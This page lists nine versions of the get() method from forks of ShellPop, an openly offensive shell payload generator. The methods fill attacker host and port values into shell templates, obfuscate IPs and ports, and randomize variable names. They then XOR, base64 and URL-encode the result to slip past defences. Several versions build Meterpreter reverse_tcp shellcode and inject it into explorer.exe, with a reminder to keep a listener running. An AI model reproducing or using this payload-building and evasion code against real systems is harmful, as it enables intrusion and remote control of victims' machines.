コード例 #1
0
    def get(self):
        """
        Generate the code.
        Apply encoding, in the correct order, of course.
        """
        # Obfuscate IP and port if set in args
        if self.args.ipfuscate:
            self.port = obfuscate_port(self.port, self.args.obfuscate_small,
                                       self.lang)

        # Set connection data to the code.
        self.code = self.code.replace("PORT", str(self.port))

        # Apply variable randomization
        self.code = randomize_vars(self.code, self.args.obfuscate_small,
                                   self.lang)

        # Apply powershell-tuning if set in args.
        self.code = powershell_wrapper(self.name, self.code, self.args)

        # Apply xor encoding.
        self.code = self.code if self.args.xor is 0 else xor_wrapper(
            self.name, self.code, self.args)

        # Apply base64 encoding.
        self.code = base64_wrapper(self.name, self.code, self.args)

        # Apply url-encoding
        if self.args.urlencode is True:
            self.code = to_urlencode(self.code)

        return self.code
コード例 #2
0
ファイル: classes.py プロジェクト: watson-h/ShellPop
    def get(self):
        """
        Generate the code.
        Apply encoding, in the correct order, of course.
        """

        # Update of 0.3.6
        # Some custom shells will not need TARGET and PORT strings.
        # To deal with that, I will just try to find them in the string first.
        if "TARGET" in self.code and "PORT" in self.code:
            self.code = str(self.code.replace("TARGET", self.host)).replace(
                "PORT", str(self.port))

            # Apply powershell-tuning if set in args.
            self.code = powershell_wrapper(self.name, self.code, self.args)
        else:
            # Custom shell. Here we need to program individually based in specifics.
            if "bloodseeker" in self.name.lower(
            ):  # This is for Bloodseeker project.

                # This one requires a stager.
                if self.args.stager is None:
                    print(error("This payload REQUIRES --stager flag."))
                    exit(1)

                print(info("Generating shellcode ..."))
                malicious_script = str(
                    WINDOWS_BLOODSEEKER_SCRIPT.decode("base64")).replace(
                        "SHELLCODEHERE",
                        shellcode_to_ps1("windows/x64/meterpreter/reverse_tcp",
                                         self.args.host, self.args.port))
                self.code = malicious_script.replace(
                    "PROCESSNAME",
                    "explorer")  # we want inject into explorer.exe
                print(
                    alert(
                        "Make sure you have a handler for windows/x64/meterpreter/reverse_tcp listening in your machine."
                    ))
                return self.code  # we dont need encoder in this one.
            else:
                print(
                    error(
                        "No custom shell procedure was arranged for this shell. This is fatal."
                    ))
                exit(1)

        # Apply xor encoding.
        self.code = self.code if self.args.xor is 0 else xor_wrapper(
            self.name, self.code, self.args)

        # Apply base64 encoding.
        self.code = base64_wrapper(self.name, self.code, self.args)

        # Apply URL-encoding
        if self.args.urlencode is True and self.args.stager is None:
            self.code = to_urlencode(self.code)

        return self.code
コード例 #3
0
ファイル: stagers.py プロジェクト: watson-h/ShellPop
    def get(self):
        """
        Generate the code.
        Apply encoding, in the correct order, of course.
        """
        # Apply base64 encoding.
        self.payload = base64_wrapper(self.name, self.payload, self.args)

        # Apply URL-encoding
        if self.args.urlencode is True:
            self.payload = to_urlencode(self.payload)
        return self.payload
コード例 #4
0
ファイル: classes.py プロジェクト: capnspacehook/ShellPop
    def get(self):
        """
        Generate the code.
        Apply encoding, in the correct order, of course.
        """

        # Update of 0.3.6
        # Some custom shells will not need TARGET and PORT strings.
        # To deal with that, I will just try to find them in the string first.
        if "TARGET" in self.code and "PORT" in self.code:
            self.code = str(self.code.replace("TARGET", self.host)).replace("PORT", str(self.port))
            
            # Apply powershell-tuning if set in args.
            self.code = powershell_wrapper(self.name, self.code, self.args)
        else:
            # Custom shell. Here we need to program individually based in specifics.
            # TODO: I need to separate this into a custom file.

            if "bat2meterpreter" in self.name.lower():
                print(info("Generating shellcode ..."))
                return self.code + shellcode_to_hex("windows/meterpreter/reverse_tcp", self.args.host, self.args.port)

            if "bloodseeker" in self.name.lower():  # This is for Bloodseeker project.
                
                # This one requires a stager.
                if self.args.stager is None:
                    print(error("This payload REQUIRES --stager flag."))
                    exit(1)

                print(info("Generating shellcode ..."))
                malicious_script = str(WINDOWS_BLOODSEEKER_SCRIPT.decode("base64")).replace("SHELLCODEHERE", shellcode_to_ps1("windows/x64/meterpreter/reverse_tcp", self.args.host, self.args.port))

                # TODO: Create a --bloodseeker-process flag to specify process name
                process_name = "explorer"
                self.code = malicious_script.replace("PROCESSNAME", process_name)
                print(alert("Make sure you have a handler for windows/x64/meterpreter/reverse_tcp listening \
                in your machine."))
                return self.code  # we don't need encoder in this one.
            else:
                print(error("No custom shell procedure was arranged for this shell. This is fatal."))
                exit(1)
        
        # Apply xor encoding.
        self.code = self.code if self.args.xor is 0 else xor_wrapper(self.name, self.code, self.args)

        # Apply base64 encoding.
        self.code = base64_wrapper(self.name, self.code, self.args)

        # Apply URL-encoding
        if self.args.urlencode is True and self.args.stager is None:
            self.code = to_urlencode(self.code)
        
        return self.code
コード例 #5
0
ファイル: stagers.py プロジェクト: bradfireborn/ShellPop
    def get(self):
        """
        Generate the code.
        Apply encoding, in the correct order, of course.
        """
        # Apply base64 encoding.
        self.payload = base64_wrapper(self.name, self.payload, self.args)

        # Apply URL-encoding
        if self.args.urlencode is True:
            self.payload = to_urlencode(self.payload)
        return self.payload
コード例 #6
0
    def get(self):
        """
        Generate the code.
        Apply encoding, in the correct order, of course.
        """
        self.code = self.code.replace("PORT", str(self.port))

        # Apply xor encoding.
        self.code = self.code if self.args.xor is 0 else xor_wrapper(
            self.name, self.code, self.args)

        # Apply base64 encoding.
        self.code = base64_wrapper(self.name, self.code, self.args)

        # Apply url-encoding
        if self.args.urlencode is True:
            self.code = to_urlencode(self.code)

        return self.code
コード例 #7
0
ファイル: classes.py プロジェクト: capnspacehook/ShellPop
    def get(self):
        """
        Generate the code.
        Apply encoding, in the correct order, of course.
        """
        # Set connection data to the code.
        self.code = self.code.replace("PORT", str(self.port))

        # Apply powershell-tuning if set in args.
        self.code = powershell_wrapper(self.name, self.code, self.args)

        # Apply xor encoding.
        self.code = self.code if self.args.xor is 0 else xor_wrapper(self.name, self.code, self.args)

        # Apply base64 encoding.
        self.code = base64_wrapper(self.name, self.code, self.args)

        # Apply url-encoding
        if self.args.urlencode is True:
            self.code = to_urlencode(self.code)
        
        return self.code
コード例 #8
0
ファイル: classes.py プロジェクト: watson-h/ShellPop
    def get(self):
        """
        Generate the code.
        Apply encoding, in the correct order, of course.
        """
        # Set connection data to the code.
        self.code = self.code.replace("PORT", str(self.port))

        # Apply powershell-tuning if set in args.
        self.code = powershell_wrapper(self.name, self.code, self.args)

        # Apply xor encoding.
        self.code = self.code if self.args.xor is 0 else xor_wrapper(
            self.name, self.code, self.args)

        # Apply base64 encoding.
        self.code = base64_wrapper(self.name, self.code, self.args)

        # Apply url-encoding
        if self.args.urlencode is True:
            self.code = to_urlencode(self.code)

        return self.code
コード例 #9
0
    def get(self):
        """
        Generate the code.
        Apply encoding, in the correct order, of course.
        """
        # Obfuscate IP and port if set in args
        if self.args.ipfuscate and self.lang != "powershell":  # Windows shells doesn't support ipfuscation
            self.host = ipfuscate(self.host, self.args.obfuscate_small)
            self.port = obfuscate_port(self.port, self.args.obfuscate_small,
                                       self.lang)

        # Update of 0.3.6
        # Some custom shells will not need TARGET and PORT strings.
        # To deal with that, I will just try to find them in the string first.
        if "TARGET" in self.code and "PORT" in self.code:
            self.code = str(self.code.replace("TARGET", self.host)).replace(
                "PORT", str(self.port))

            # Apply variable randomization
            self.code = randomize_vars(self.code, self.args.obfuscate_small,
                                       self.lang)

            # Apply powershell-tuning if set in args.
            self.code = powershell_wrapper(self.name, self.code, self.args)

        else:
            # Custom shell. Here we need to program individually based in specifics.
            # TODO: I need to separate this into a custom file.

            if "bat2meterpreter" in self.name.lower():
                print(info("Generating shellcode ..."))
                return self.code + shellcode_to_hex(
                    "windows/meterpreter/reverse_tcp", self.args.host,
                    self.args.port)

            if "bloodseeker" in self.name.lower(
            ):  # This is for Bloodseeker project.

                # This one requires a stager.
                if self.args.stager is None:
                    print(error("This payload REQUIRES --stager flag."))
                    exit(1)

                print(info("Generating shellcode ..."))
                malicious_script = str(
                    WINDOWS_BLOODSEEKER_SCRIPT.decode("base64")).replace(
                        "SHELLCODEHERE",
                        shellcode_to_ps1("windows/x64/meterpreter/reverse_tcp",
                                         self.args.host, self.args.port))

                # TODO: Create a --bloodseeker-process flag to specify process name
                process_name = "explorer"
                self.code = malicious_script.replace("PROCESSNAME",
                                                     process_name)
                print(
                    alert(
                        "Make sure you have a handler for windows/x64/meterpreter/reverse_tcp listening \
                in your machine."))
                return self.code  # we don't need encoder in this one.
            else:
                print(
                    error(
                        "No custom shell procedure was arranged for this shell. This is fatal."
                    ))
                exit(1)

        # Apply xor encoding.
        self.code = self.code if self.args.xor is 0 else xor_wrapper(
            self.name, self.code, self.args)

        # Apply base64 encoding.
        self.code = base64_wrapper(self.name, self.code, self.args)

        # Apply URL-encoding
        if self.args.urlencode is True and self.args.stager is None:
            self.code = to_urlencode(self.code)

        return self.code